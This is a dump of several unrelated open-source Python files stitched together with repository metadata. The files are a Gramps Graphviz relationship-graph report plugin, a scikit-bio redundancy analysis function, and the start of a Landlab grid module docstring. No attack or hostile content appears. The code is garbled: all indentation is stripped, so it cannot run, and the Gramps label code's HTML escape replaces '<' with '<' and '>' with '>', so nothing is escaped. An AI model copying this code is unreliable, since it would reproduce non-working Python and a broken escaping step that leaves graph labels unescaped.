# Copyright (C) 2013-2015 Paul Franklin
# Copyright (C) 2015 Fabrice <fobrice@laposte.net>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
"""
Create a relationship graph using Graphviz
"""
#------------------------------------------------------------------------
#
# python modules
#
#------------------------------------------------------------------------
from functools import partial
#------------------------------------------------------------------------
#
# Gramps modules
#
#------------------------------------------------------------------------
from gramps.gen.const import GRAMPS_LOCALE as glocale
_ = glocale.translation.sgettext
from gramps.gen.plug.menu import (BooleanOption, EnumeratedListOption,
FilterOption, PersonOption, ColorOption)
from gramps.gen.plug.report import Report
from gramps.gen.plug.report import utils
from gramps.gen.plug.report import MenuReportOptions
from gramps.gen.plug.report import stdoptions
from gramps.gen.lib import ChildRefType, EventRoleType, EventType
from gramps.gen.utils.file import media_path_full, find_file
from gramps.gen.utils.thumbnails import get_thumbnail_path
from gramps.gen.relationship import get_relationship_calculator
from gramps.gen.utils.db import get_birth_or_fallback, get_death_or_fallback
from gramps.gen.display.place import displayer as _pd
from gramps.gen.proxy import CacheProxyDb
from gramps.gen.errors import ReportError
#------------------------------------------------------------------------
#
# Constant options items
#
#------------------------------------------------------------------------
_COLORS = [{'name' : _("B&W outline"), 'value' : 'outlined'},
{'name' : _("Colored outline"), 'value' : 'colored'},
{'name' : _("Color fill"), 'value' : 'filled'}]
_ARROWS = [{'name' : _("Descendants <- Ancestors"), 'value' : 'd'},
{'name' : _("Descendants -> Ancestors"), 'value' : 'a'},
{'name' : _("Descendants <-> Ancestors"), 'value' : 'da'},
{'name' : _("Descendants - Ancestors"), 'value' : ''}]
#------------------------------------------------------------------------
#
# RelGraphReport class
#
#------------------------------------------------------------------------
class RelGraphReport(Report):
def __init__(self, database, options, user):
"""
Create RelGraphReport object that produces the report.
The arguments are:
database - the GRAMPS database instance
options - instance of the Options class for this report
user - a gen.user.User() instance
This report needs the following parameters (class variables)
that come in the options class.
filter - Filter to be applied to the people of the database.
The option class carries its number, and the function
returning the list of filters.
arrow - Arrow styles for heads and tails.
showfamily - Whether to show family nodes.
incid - Whether to include IDs.
url - Whether to include URLs.
inclimg - Include images or not
imgpos - Image position, above/beside name
color - Whether to use outline, colored outline or filled color
in graph
color_males - Colour to apply to males
color_females - Colour to apply to females
color_unknown - Colour to apply to unknown genders
color_families - Colour to apply to families
dashed - Whether to use dashed lines for non-birth relationships
use_roundedcorners - Whether to use rounded corners for females
name_format - Preferred format to display names
incl_private - Whether to include private data
event_choice - Whether to include dates and/or places
occupation - Whether to include occupations
living_people - How to handle living people
years_past_death - Consider as living this many years after death
"""
Report.__init__(self, database, options, user)
menu = options.menu
get_option_by_name = options.menu.get_option_by_name
get_value = lambda name: get_option_by_name(name).get_value()
lang = menu.get_option_by_name('trans').get_value()
self._locale = self.set_locale(lang)
stdoptions.run_private_data_option(self, menu)
stdoptions.run_living_people_option(self, menu, self._locale)
self.database = CacheProxyDb(self.database)
self._db = self.database
self.includeid = get_value('incid')
self.includeurl = get_value('url')
self.includeimg = get_value('includeImages')
self.imgpos = get_value('imageOnTheSide')
self.use_roundedcorners = get_value('useroundedcorners')
self.adoptionsdashed = get_value('dashed')
self.show_families = get_value('showfamily')
self.use_subgraphs = get_value('usesubgraphs')
self.event_choice = get_value('event_choice')
self.occupation = get_value('occupation')
self.use_html_output = False
self.colorize = get_value('color')
color_males = get_value('colormales')
color_females = get_value('colorfemales')
color_unknown = get_value('colorunknown')
color_families = get_value('colorfamilies')
self.colors = {
'male': color_males,
'female': color_females,
'unknown': color_unknown,
'family': color_families
}
arrow_str = get_value('arrow')
if 'd' in arrow_str:
self.arrowheadstyle = 'normal'
else:
self.arrowheadstyle = 'none'
if 'a' in arrow_str:
self.arrowtailstyle = 'normal'
else:
self.arrowtailstyle = 'none'
filter_option = get_option_by_name('filter')
self._filter = filter_option.get_filter()
stdoptions.run_name_format_option(self, menu)
pid = get_value('pid')
self.center_person = self._db.get_person_from_gramps_id(pid)
if self.center_person is None:
raise ReportError(_("Person %s is not in the Database") % pid)
self.increlname = get_value('increlname')
if self.increlname:
self.rel_calc = get_relationship_calculator(reinit=True,
clocale=self._locale)
if __debug__:
self.advrelinfo = get_value('advrelinfo')
else:
self.advrelinfo = False
def write_report(self):
person_handles = self._filter.apply(self._db,
self._db.iter_person_handles())
if len(person_handles) > 1:
if self._user:
self._user.begin_progress(_("Relationship Graph"),
_("Generating report"),
len(person_handles) * 2)
self.add_persons_and_families(person_handles)
self.add_child_links_to_families(person_handles)
if self._user:
self._user.end_progress()
def add_child_links_to_families(self, person_handles):
"""
returns string of Graphviz edges linking parents to families or
children
"""
# Hash people in a dictionary for faster inclusion checking
person_dict = dict([handle, 1] for handle in person_handles)
for person_handle in person_handles:
if self._user:
self._user.step_progress()
person = self._db.get_person_from_handle(person_handle)
p_id = person.get_gramps_id()
for fam_handle in person.get_parent_family_handle_list():
family = self._db.get_family_from_handle(fam_handle)
father_handle = family.get_father_handle()
mother_handle = family.get_mother_handle()
for child_ref in family.get_child_ref_list():
if child_ref.ref == person_handle:
frel = child_ref.frel
mrel = child_ref.mrel
break
if (self.show_families and
((father_handle and father_handle in person_dict) or
(mother_handle and mother_handle in person_dict))):
# Link to the family node if either parent is in graph
self.add_family_link(p_id, family, frel, mrel)
else:
# Link to the parents' nodes directly, if they are in graph
if father_handle and father_handle in person_dict:
self.add_parent_link(p_id, father_handle, frel)
if mother_handle and mother_handle in person_dict:
self.add_parent_link(p_id, mother_handle, mrel)
def add_family_link(self, p_id, family, frel, mrel):
"Links the child to a family"
style = 'solid'
adopted = ((int(frel) != ChildRefType.BIRTH) or
(int(mrel) != ChildRefType.BIRTH))
# If birth relation to father is NONE, meaning there is no father and
# if birth relation to mother is BIRTH then solid line
if (int(frel) == ChildRefType.NONE and
int(mrel) == ChildRefType.BIRTH):
adopted = False
if adopted and self.adoptionsdashed:
style = 'dotted'
self.doc.add_link(family.get_gramps_id(), p_id, style,
self.arrowheadstyle, self.arrowtailstyle)
def add_parent_link(self, p_id, parent_handle, rel):
"Links the child to a parent"
style = 'solid'
if (int(rel) != ChildRefType.BIRTH) and self.adoptionsdashed:
style = 'dotted'
parent = self._db.get_person_from_handle(parent_handle)
self.doc.add_link(parent.get_gramps_id(), p_id, style,
self.arrowheadstyle, self.arrowtailstyle)
def add_persons_and_families(self, person_handles):
"adds nodes for persons and their families"
# variable to communicate with get_person_label
self.use_html_output = False
# The list of families for which we have output the node,
# so we don't do it twice
families_done = {}
for person_handle in person_handles:
if self._user:
self._user.step_progress()
# determine per person if we use HTML style label
if self.includeimg:
self.use_html_output = True
person = self._db.get_person_from_handle(person_handle)
if person is None:
continue
p_id = person.get_gramps_id()
# Output the person's node
label = self.get_person_label(person)
(shape, style, color, fill) = self.get_gender_style(person)
url = ""
if self.includeurl:
phan = person_handle
dirpath = "ppl/%s/%s" % (phan[-1], phan[-2])
dirpath = dirpath.lower()
url = "%s/%s.html" % (dirpath, phan)
self.doc.add_node(p_id, label, shape, color, style, fill, url)
# Output families where person is a parent
if self.show_families:
family_list = person.get_family_handle_list()
for fam_handle in family_list:
family = self._db.get_family_from_handle(fam_handle)
if family is None:
continue
if fam_handle not in families_done:
families_done[fam_handle] = 1
self.__add_family(fam_handle)
# If subgraphs are not chosen then each parent is linked
# separately to the family. This gives Graphviz greater
# control over the layout of the whole graph but
# may leave spouses not positioned together.
if not self.use_subgraphs:
self.doc.add_link(p_id, family.get_gramps_id(), "",
self.arrowheadstyle,
self.arrowtailstyle)
def __add_family(self, fam_handle):
"""Add a node for a family and optionally link the spouses to it"""
fam = self._db.get_family_from_handle(fam_handle)
if fam is None:
return
fam_id = fam.get_gramps_id()
m_type = m_date = m_place = ""
d_type = d_date = d_place = ""
for event_ref in fam.get_event_ref_list():
event = self._db.get_event_from_handle(event_ref.ref)
if event is None:
continue
if (event.type == EventType.MARRIAGE and
(event_ref.get_role() == EventRoleType.FAMILY or
event_ref.get_role() == EventRoleType.PRIMARY)):
m_type = event.type
m_date = self.get_date_string(event)
if not (self.event_choice == 3 and m_date):
m_place = self.get_place_string(event)
break
if (event.type == EventType.DIVORCE and
(event_ref.get_role() == EventRoleType.FAMILY or
event_ref.get_role() == EventRoleType.PRIMARY)):
d_type = event.type
d_date = self.get_date_string(event)
if not (self.event_choice == 3 and d_date):
d_place = self.get_place_string(event)
break
labellines = list()
if self.includeid == 2:
# id on separate line
labellines.append("(%s)" % fam_id)
if self.event_choice == 7:
if m_type:
line = m_type.get_abbreviation()
if m_date:
line += ' %s' % m_date
if m_date and m_place:
labellines.append(line)
line = ''
if m_place:
line += ' %s' % m_place
labellines.append(line)
if d_type:
line = d_type.get_abbreviation()
if d_date:
line += ' %s' % d_date
if d_date and d_place:
labellines.append(line)
line = ''
if d_place:
line += ' %s' % d_place
labellines.append(line)
else:
if m_date:
labellines.append("(%s)" % m_date)
if m_place:
labellines.append("(%s)" % m_place)
label = "\\n".join(labellines)
labellines = list()
if self.includeid == 1:
# id on same line
labellines.append("(%s)" % fam_id)
if len(label):
labellines.append(label)
label = ' '.join(labellines)
color = ""
fill = ""
style = "solid"
if self.colorize == 'colored':
color = self.colors['family']
elif self.colorize == 'filled':
fill = self.colors['family']
style = "filled"
self.doc.add_node(fam_id, label, "ellipse", color, style, fill)
# If subgraphs are used then we add both spouses here and Graphviz
# will attempt to position both spouses closely together.
# TODO: A person who is a parent in more than one family may only be
# positioned next to one of their spouses. The code currently
# does not take into account multiple spouses.
if self.use_subgraphs:
self.doc.start_subgraph(fam_id)
f_handle = fam.get_father_handle()
m_handle = fam.get_mother_handle()
if f_handle:
father = self._db.get_person_from_handle(f_handle)
self.doc.add_link(father.get_gramps_id(),
fam_id, "",
self.arrowheadstyle,
self.arrowtailstyle)
if m_handle:
mother = self._db.get_person_from_handle(m_handle)
self.doc.add_link(mother.get_gramps_id(),
fam_id, "",
self.arrowheadstyle,
self.arrowtailstyle)
self.doc.end_subgraph()
def get_gender_style(self, person):
"return gender specific person style"
gender = person.get_gender()
shape = "box"
style = "solid"
color = ""
fill = ""
if gender == person.FEMALE and self.use_roundedcorners:
style = "rounded"
elif gender == person.UNKNOWN:
shape = "hexagon"
if person == self.center_person and self.increlname:
shape = "octagon"
if self.colorize == 'colored':
if gender == person.MALE:
color = self.colors['male']
elif gender == person.FEMALE:
color = self.colors['female']
else:
color = self.colors['unknown']
elif self.colorize == 'filled':
style += ",filled"
if gender == person.MALE:
fill = self.colors['male']
elif gender == person.FEMALE:
fill = self.colors['female']
else:
fill = self.colors['unknown']
return(shape, style, color, fill)
def get_person_label(self, person):
"return person label string"
# see if we have an image to use for this person
image_path = None
if self.use_html_output:
media_list = person.get_media_list()
if len(media_list) > 0:
media_handle = media_list[0].get_reference_handle()
media = self._db.get_media_from_handle(media_handle)
media_mime_type = media.get_mime_type()
if media_mime_type[0:5] == "image":
image_path = get_thumbnail_path(
media_path_full(self._db, media.get_path()),
rectangle=media_list[0].get_rectangle())
# test if thumbnail actually exists in thumbs
# (import of data means media files might not be present
image_path = find_file(image_path)
label = ""
line_delimiter = '\\n'
# If we have an image, then start an HTML table; remember to close
# the table afterwards!
#
# This isn't a free-form HTML format here...just a few keywords that
# happen to be
# similar to keywords commonly seen in HTML. For additional
# information on what
# is allowed, see:
#
# http://www.graphviz.org/info/shapes.html#html
#
if self.use_html_output and image_path:
line_delimiter = '<BR/>'
label += '<TABLE BORDER="0" CELLSPACING="2" CELLPADDING="0" '
label += 'CELLBORDER="0"><TR><TD></TD><TD>'
label += '<IMG SRC="%s"/></TD><TD></TD>' % image_path
if self.imgpos == 0:
#trick it into not stretching the image
label += '</TR><TR><TD COLSPAN="3">'
else:
label += '<TD>'
else:
#no need for html label with this person
self.use_html_output = False
# at the very least, the label must have the person's name
p_name = self._name_display.display(person)
if self.use_html_output:
# avoid < and > in the name, as this is html text
label += p_name.replace('<', '<').replace('>', '>')
else:
label += p_name
p_id = person.get_gramps_id()
if self.includeid == 1: # same line
label += " (%s)" % p_id
elif self.includeid == 2: # own line
label += "%s(%s)" % (line_delimiter, p_id)
if self.event_choice != 0:
b_date, d_date, b_place, d_place, b_type, d_type = \
self.get_event_strings(person)
if self.event_choice in [1, 2, 3, 4, 5] and (b_date or d_date):
label += '%s(' % line_delimiter
if b_date:
label += '%s' % b_date
label += ' - '
if d_date:
label += '%s' % d_date
label += ')'
if (self.event_choice in [2, 3, 5, 6] and
(b_place or d_place) and
not (self.event_choice == 3 and (b_date or d_date))
):
label += '%s(' % line_delimiter
if b_place:
label += '%s' % b_place
label += ' - '
if d_place:
label += '%s' % d_place
label += ')'
if self.event_choice == 7:
if b_type:
label += '%s%s' % (line_delimiter, b_type.get_abbreviation())
if b_date:
label += ' %s' % b_date
if b_place:
label += ' %s' % b_place
if d_type:
label += '%s%s' % (line_delimiter, d_type.get_abbreviation())
if d_date:
label += ' %s' % d_date
if d_place:
label += ' %s' % d_place
if self.increlname and self.center_person != person:
# display relationship info
if self.advrelinfo:
(relationship, _ga, _gb) = self.rel_calc.get_one_relationship(
self._db, self.center_person, person,
extra_info=True, olocale=self._locale)
if relationship:
label += "%s(%s Ga=%d Gb=%d)" % (line_delimiter,
relationship, _ga, _gb)
else:
relationship = self.rel_calc.get_one_relationship(
self._db, self.center_person, person,
olocale=self._locale)
if relationship:
label += "%s(%s)" % (line_delimiter, relationship)
if self.occupation > 0:
event_refs = person.get_primary_event_ref_list()
events = [event for event in
[self._db.get_event_from_handle(ref.ref)
for ref in event_refs]
if event.get_type() == EventType(EventType.OCCUPATION)]
if len(events) > 0:
events.sort(key=lambda x: x.get_date_object())
if self.occupation == 1:
occupation = events[-1].get_description()
if occupation:
label += "%s(%s)" % (line_delimiter, occupation)
elif self.occupation == 2:
for evt in events:
date = self.get_date_string(evt)
place = self.get_place_string(evt)
desc = evt.get_description()
if not date and not desc and not place:
continue
label += '%s(' % line_delimiter
if date:
label += '%s' % date
if desc:
label += ' '
if desc:
label += '%s' % desc
if place:
if date or desc:
label += ', '
label += '%s' % place
label += ')'
# see if we have a table that needs to be terminated
if self.use_html_output:
label += '</TD></TR></TABLE>'
return label
else:
# non html label is enclosed by "" so escape other "
return label.replace('"', '\\\"')
def get_event_strings(self, person):
"returns tuple of birth/christening and death/burying date strings"
birth_date = birth_place = death_date = death_place = ""
birth_type = death_type = ""
birth_event = get_birth_or_fallback(self._db, person)
if birth_event:
birth_type = birth_event.type
birth_date = self.get_date_string(birth_event)
birth_place = self.get_place_string(birth_event)
death_event = get_death_or_fallback(self._db, person)
if death_event:
death_type = death_event.type
death_date = self.get_date_string(death_event)
death_place = self.get_place_string(death_event)
return (birth_date, death_date, birth_place,
death_place, birth_type, death_type)
def get_date_string(self, event):
"""
return date string for an event label.
Based on the data availability and preferences, we select one
of the following for a given event:
year only
complete date
empty string
"""
if event and event.get_date_object() is not None:
event_date = event.get_date_object()
if event_date.get_year_valid():
if self.event_choice in [4, 5]:
return '%i' % event_date.get_year()
elif self.event_choice in [1, 2, 3, 7]:
return self._get_date(event_date)
return ''
def get_place_string(self, event):
"""
return place string for an event label.
Based on the data availability and preferences, we select one
of the following for a given event:
place name
empty string
"""
if event and self.event_choice in [2, 3, 5, 6, 7]:
return _pd.display_event(self._db, event)
return ''
#------------------------------------------------------------------------
#
# RelGraphOptions class
#
#------------------------------------------------------------------------
class RelGraphOptions(MenuReportOptions):
"""
Defines options and provides handling interface.
"""
def __init__(self, name, dbase):
self.__pid = None
self.__filter = None
self.__show_relships = None
self.__show_ga_gb = None
self.__include_images = None
self.__image_on_side = None
self.__db = dbase
self._nf = None
self.event_choice = None
MenuReportOptions.__init__(self, name, dbase)
def add_menu_options(self, menu):
################################
category_name = _("Report Options")
add_option = partial(menu.add_option, category_name)
################################
self.__filter = FilterOption(_("Filter"), 0)
self.__filter.set_help(
_("Determines what people are included in the graph"))
add_option("filter", self.__filter)
self.__filter.connect('value-changed', self.__filter_changed)
self.__pid = PersonOption(_("Center Person"))
self.__pid.set_help(_("The center person for the report"))
menu.add_option(category_name, "pid", self.__pid)
self.__pid.connect('value-changed', self.__update_filters)
self._nf = stdoptions.add_name_format_option(menu, category_name)
self._nf.connect('value-changed', self.__update_filters)
self.__update_filters()
stdoptions.add_private_data_option(menu, category_name)
stdoptions.add_living_people_option(menu, category_name)
stdoptions.add_localization_option(menu, category_name)
################################
add_option = partial(menu.add_option, _("Include"))
################################
self.event_choice = EnumeratedListOption(_('Dates and/or Places'), 0)
self.event_choice.add_item(0, _('Do not include any dates or places'))
self.event_choice.add_item(1, _('Include (birth, marriage, death) '
'dates, but no places'))
self.event_choice.add_item(2, _('Include (birth, marriage, death) '
'dates, and places'))
self.event_choice.add_item(3, _('Include (birth, marriage, death) '
'dates, and places if no dates'))
self.event_choice.add_item(4, _('Include (birth, marriage, death) '
'years, but no places'))
self.event_choice.add_item(5, _('Include (birth, marriage, death) '
'years, and places'))
self.event_choice.add_item(6, _('Include (birth, marriage, death) '
'places, but no dates'))
self.event_choice.add_item(7, _('Include (birth, marriage, death) '
'dates and places on same line'))
self.event_choice.set_help(
_("Whether to include dates and/or places"))
add_option("event_choice", self.event_choice)
url = BooleanOption(_("Include URLs"), False)
url.set_help(_("Include a URL in each graph node so "
"that PDF and imagemap files can be "
"generated that contain active links "
"to the files generated by the 'Narrated "
"Web Site' report."))
add_option("url", url)
include_id = EnumeratedListOption(_('Include Gramps ID'), 0)
include_id.add_item(0, _('Do not include'))
include_id.add_item(1, _('Share an existing line'))
include_id.add_item(2, _('On a line of its own'))
include_id.set_help(_("Whether (and where) to include Gramps IDs"))
add_option("incid", include_id)
self.__show_relships = BooleanOption(
_("Include relationship to center person"), False)
self.__show_relships.set_help(_("Whether to show every person's "
"relationship to the center person"))
add_option("increlname", self.__show_relships)
self.__show_relships.connect('value-changed',
self.__show_relships_changed)
self.__include_images = BooleanOption(
_('Include thumbnail images of people'), False)
self.__include_images.set_help(
_("Whether to include thumbnails of people."))
add_option("includeImages", self.__include_images)
self.__include_images.connect('value-changed', self.__image_changed)
self.__image_on_side = EnumeratedListOption(_("Thumbnail Location"), 0)
self.__image_on_side.add_item(0, _('Above the name'))
self.__image_on_side.add_item(1, _('Beside the name'))
self.__image_on_side.set_help(
_("Where the thumbnail image should appear relative to the name"))
add_option("imageOnTheSide", self.__image_on_side)
#occupation = BooleanOption(_("Include occupation"), False)
occupation = EnumeratedListOption(_('Include occupation'), 0)
occupation.add_item(0, _('Do not include any occupation'))
occupation.add_item(1, _('Include description '
'of most recent occupation'))
occupation.add_item(2, _('Include date, description and place '
'of all occupations'))
occupation.set_help(_("Whether to include the last occupation"))
add_option("occupation", occupation)
if __debug__:
self.__show_ga_gb = BooleanOption(_("Include relationship "
"debugging numbers also"),
False)
self.__show_ga_gb.set_help(_("Whether to include 'Ga' and 'Gb' "
"also, to debug the relationship "
"calculator"))
add_option("advrelinfo", self.__show_ga_gb)
################################
add_option = partial(menu.add_option, _("Graph Style"))
################################
color = EnumeratedListOption(_("Graph coloring"), 'filled')
for i in range(0, len(_COLORS)):
color.add_item(_COLORS[i]["value"], _COLORS[i]["name"])
color.set_help(_("Males will be shown with blue, females "
"with red. If the sex of an individual "
"is unknown it will be shown with gray."))
add_option("color", color)
color_males = ColorOption(_('Males'), '#e0e0ff')
color_males.set_help(_('The color to use to display men.'))
add_option('colormales', color_males)
color_females = ColorOption(_('Females'), '#ffe0e0')
color_females.set_help(_('The color to use to display women.'))
add_option('colorfemales', color_females)
color_unknown = ColorOption(_('Unknown'), '#e0e0e0')
color_unknown.set_help(
_('The color to use when the gender is unknown.')
)
add_option('colorunknown', color_unknown)
color_family = ColorOption(_('Families'), '#ffffe0')
color_family.set_help(_('The color to use to display families.'))
add_option('colorfamilies', color_family)
arrow = EnumeratedListOption(_("Arrowhead direction"), 'd')
for i in range(0, len(_ARROWS)):
arrow.add_item(_ARROWS[i]["value"], _ARROWS[i]["name"])
arrow.set_help(_("Choose the direction that the arrows point."))
add_option("arrow", arrow)
# see bug report #2180
roundedcorners = BooleanOption(_("Use rounded corners"), False)
roundedcorners.set_help(_("Use rounded corners to differentiate "
"between women and men."))
add_option("useroundedcorners", roundedcorners)
dashed = BooleanOption(
_("Indicate non-birth relationships with dotted lines"), True)
dashed.set_help(_("Non-birth relationships will show up "
"as dotted lines in the graph."))
add_option("dashed", dashed)
showfamily = BooleanOption(_("Show family nodes"), True)
showfamily.set_help(_("Families will show up as ellipses, linked "
"to parents and children."))
add_option("showfamily", showfamily)
def __update_filters(self):
"""
Update the filter list based on the selected person
"""
gid = self.__pid.get_value()
person = self.__db.get_person_from_gramps_id(gid)
nfv = self._nf.get_value()
filter_list = utils.get_person_filters(person,
include_single=False,
name_format=nfv)
self.__filter.set_filters(filter_list)
def __filter_changed(self):
"""
Handle filter change. If the filter is not specific to a person,
disable the person option
"""
if self.__show_relships and self.__show_relships.get_value():
self.__pid.set_available(True)
filter_value = self.__filter.get_value()
if filter_value == 0: # "Entire Database" (as "include_single=False")
self.__pid.set_available(False)
else:
# The other filters need a center person (assume custom ones too)
self.__pid.set_available(True)
def __image_changed(self):
"""
Handle thumbnail change. If the image is not to be included, make the
image location option unavailable.
"""
self.__image_on_side.set_available(self.__include_images.get_value())
def __show_relships_changed(self):
"""
Enable/disable menu items if relationships are required
"""
if self.__show_ga_gb:
self.__show_ga_gb.set_available(self.__show_relships.get_value())
self.__filter_changed()
|
beernarrd/gramps
|
gramps/plugins/graph/gvrelgraph.py
|
Python
|
gpl-2.0
| 37,619
|
[
"Brian"
] |
5779e36b93f9b2f6cd7111383624f2a3bdd5700e73aab54fcc36fd00948b5fc4
|
# ----------------------------------------------------------------------------
# Copyright (c) 2013--, scikit-bio development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
# ----------------------------------------------------------------------------
import numpy as np
import pandas as pd
from scipy.linalg import svd, lstsq
from skbio.util._decorator import experimental
from ._ordination_results import OrdinationResults
from ._utils import corr, svd_rank, scale
@experimental(as_of="0.4.0")
def rda(y, x, scale_Y=False, scaling=1):
r"""Compute redundancy analysis, a type of canonical analysis.
It is related to PCA and multiple regression because the explained
variables `y` are fitted to the explanatory variables `x` and PCA
is then performed on the fitted values. A similar process is
performed on the residuals.
RDA should be chosen if the studied gradient is small, and CCA
when it's large, so that the contingency table is sparse.
Parameters
----------
y : pd.DataFrame
:math:`n \times p` response matrix, where :math:`n` is the number
of samples and :math:`p` is the number of features. Its columns
need be dimensionally homogeneous (or you can set `scale_Y=True`).
This matrix is also referred to as the community matrix that
commonly stores information about species abundances
x : pd.DataFrame
:math:`n \times m, n \geq m` matrix of explanatory
variables, where :math:`n` is the number of samples and
:math:`m` is the number of metadata variables. Its columns
need not be standardized, but doing so turns regression
coefficients into standard regression coefficients.
scale_Y : bool, optional
Controls whether the response matrix columns are scaled to
have unit standard deviation. Defaults to `False`.
scaling : int
Scaling type 1 produces a distance biplot. It focuses on
the ordination of rows (samples) because their transformed
distances approximate their original euclidean
distances. Especially interesting when most explanatory
variables are binary.
Scaling type 2 produces a correlation biplot. It focuses
on the relationships among explained variables (`y`). It
is interpreted like scaling type 1, but taking into
account that distances between objects don't approximate
their euclidean distances.
See more details about distance and correlation biplots in
[1]_, \S 9.1.4.
Returns
-------
OrdinationResults
Object that stores the computed eigenvalues, the
proportion explained by each of them (per unit),
transformed coordinates for feature and samples, biplot
scores, sample constraints, etc.
See Also
--------
ca
cca
OrdinationResults
Notes
-----
The algorithm is based on [1]_, \S 11.1, and is expected to
give the same results as ``rda(y, x)`` in R's package vegan.
The eigenvalues reported in vegan are re-normalized to
:math:`\sqrt{\frac{s}{n-1}}` `n` is the number of samples,
and `s` is the original eigenvalues. Here we will only return
the original eigenvalues, as recommended in [1]_.
References
----------
.. [1] Legendre P. and Legendre L. 1998. Numerical
Ecology. Elsevier, Amsterdam.
"""
Y = y.as_matrix()
X = x.as_matrix()
n, p = y.shape
n_, m = x.shape
if n != n_:
raise ValueError(
"Both data matrices must have the same number of rows.")
if n < m:
# Mmm actually vegan is able to do this case, too
raise ValueError(
"Explanatory variables cannot have less rows than columns.")
sample_ids = y.index
feature_ids = y.columns
# Centre response variables (they must be dimensionally
# homogeneous)
Y = scale(Y, with_std=scale_Y)
# Centre explanatory variables
X = scale(X, with_std=False)
# Distribution of variables should be examined and transformed
# if necessary (see paragraph 4 in p. 580 L&L 1998)
# Compute Y_hat (fitted values by multivariate linear
# regression, that is, linear least squares). Formula 11.6 in
# L&L 1998 involves solving the normal equations, but that fails
# when cond(X) ~ eps**(-0.5). A more expensive but much more
# stable solution (fails when cond(X) ~ eps**-1) is computed
# using the QR decomposition of X = QR:
# (11.6) Y_hat = X [X' X]^{-1} X' Y
# = QR [R'Q' QR]^{-1} R'Q' Y
# = QR [R' R]^{-1} R'Q' Y
# = QR R^{-1} R'^{-1} R' Q' Y
# = Q Q' Y
# and B (matrix of regression coefficients)
# (11.4) B = [X' X]^{-1} X' Y
# = R^{-1} R'^{-1} R' Q' Y
# = R^{-1} Q'
# Q, R = np.linalg.qr(X)
# Y_hat = Q.dot(Q.T).dot(Y)
# B = scipy.linalg.solve_triangular(R, Q.T.dot(Y))
# This works provided X has full rank. When not, you can still
# fix it using R's pseudoinverse or partitioning R. To avoid any
# issues, like the numerical instability when trying to
# reproduce an example in L&L where X was rank-deficient, we'll
# just use `np.linalg.lstsq`, which uses the SVD decomposition
# under the hood and so it's also more expensive.
B, _, rank_X, _ = lstsq(X, Y)
Y_hat = X.dot(B)
# Now let's perform PCA on the fitted values from the multiple
# regression
u, s, vt = svd(Y_hat, full_matrices=False)
# vt are the right eigenvectors, which is what we need to
# perform PCA. That is, we're changing points in Y_hat from the
# canonical basis to the orthonormal basis given by the right
# eigenvectors of Y_hat (or equivalently, the eigenvectors of
# the covariance matrix Y_hat.T.dot(Y_hat))
# See 3) in p. 583 in L&L 1998
rank = svd_rank(Y_hat.shape, s)
# Theoretically, there're at most min(p, m, n - 1) non-zero eigenvalues
U = vt[:rank].T # U as in Fig. 11.2
# Ordination in the space of response variables. Its columns are
# sample scores. (Eq. 11.12)
F = Y.dot(U)
# Ordination in the space of explanatory variables. Its columns
# are fitted sample scores. (Eq. 11.13)
Z = Y_hat.dot(U)
# Canonical coefficients (formula 11.14)
# C = B.dot(U) # Not used
Y_res = Y - Y_hat
# PCA on the residuals
u_res, s_res, vt_res = svd(Y_res, full_matrices=False)
# See 9) in p. 587 in L&L 1998
rank_res = svd_rank(Y_res.shape, s_res)
# Theoretically, there're at most min(p, n - 1) non-zero eigenvalues as
U_res = vt_res[:rank_res].T
F_res = Y_res.dot(U_res) # Ordination in the space of residuals
eigenvalues = np.r_[s[:rank], s_res[:rank_res]]
# Compute scores
if scaling not in {1, 2}:
raise NotImplementedError("Only scalings 1, 2 available for RDA.")
# According to the vegan-FAQ.pdf, the scaling factor for scores
# is (notice that L&L 1998 says in p. 586 that such scaling
# doesn't affect the interpretation of a biplot):
pc_ids = ['RDA%d' % (i+1) for i in range(len(eigenvalues))]
eigvals = pd.Series(eigenvalues, index=pc_ids)
const = np.sum(eigenvalues**2)**0.25
if scaling == 1:
scaling_factor = const
elif scaling == 2:
scaling_factor = eigenvalues / const
feature_scores = np.hstack((U, U_res)) * scaling_factor
sample_scores = np.hstack((F, F_res)) / scaling_factor
feature_scores = pd.DataFrame(feature_scores,
index=feature_ids,
columns=pc_ids)
sample_scores = pd.DataFrame(sample_scores,
index=sample_ids,
columns=pc_ids)
# TODO not yet used/displayed
sample_constraints = pd.DataFrame(np.hstack((Z, F_res)) / scaling_factor,
index=sample_ids,
columns=pc_ids)
# Vegan seems to compute them as corr(X[:, :rank_X],
# u) but I don't think that's a good idea. In fact, if
# you take the example shown in Figure 11.3 in L&L 1998 you
# can see that there's an arrow for each of the 4
# environmental variables (depth, coral, sand, other) even if
# other = not(coral or sand)
biplot_scores = corr(X, u)
biplot_scores = pd.DataFrame(biplot_scores,
index=x.columns,
columns=pc_ids[:biplot_scores.shape[1]])
# The "Correlations of environmental variables with sample
# scores" from table 11.4 are quite similar to vegan's biplot
# scores, but they're computed like this:
# corr(X, F))
p_explained = pd.Series(eigenvalues / eigenvalues.sum(), index=pc_ids)
return OrdinationResults('RDA', 'Redundancy Analysis',
eigvals=eigvals,
proportion_explained=p_explained,
features=feature_scores,
samples=sample_scores,
biplot_scores=biplot_scores,
sample_constraints=sample_constraints)
|
kdmurray91/scikit-bio
|
skbio/stats/ordination/_redundancy_analysis.py
|
Python
|
bsd-3-clause
| 9,325
|
[
"scikit-bio"
] |
fd341fc4ef22ab7a0ccc055d114a0d57dfaac64a5c655262218ac6fd45900731
|
#! /usr/env/python
"""
Python implementation of VoronoiDelaunayGrid, a class used to create and manage
unstructured, irregular grids for 2D numerical models.
Getting Information about a Grid
--------------------------------
The following attributes, properties, and methods provide data about the grid,
its geometry, and the connectivity among the various elements. Each grid
element has an ID number, which is also its position in an array that
contains information about that type of element. For example, the *x*
coordinate of node 5 would be found at `grid.node_x[5]`.
The naming of grid-element arrays is *attribute*`_at_`*element*, where
*attribute* is the name of the data in question, and *element* is the element
to which the attribute applies. For example, the property `node_at_cell`
contains the ID of the node associated with each cell. For example,
`node_at_cell[3]` contains the *node ID* of the node associated with cell 3.
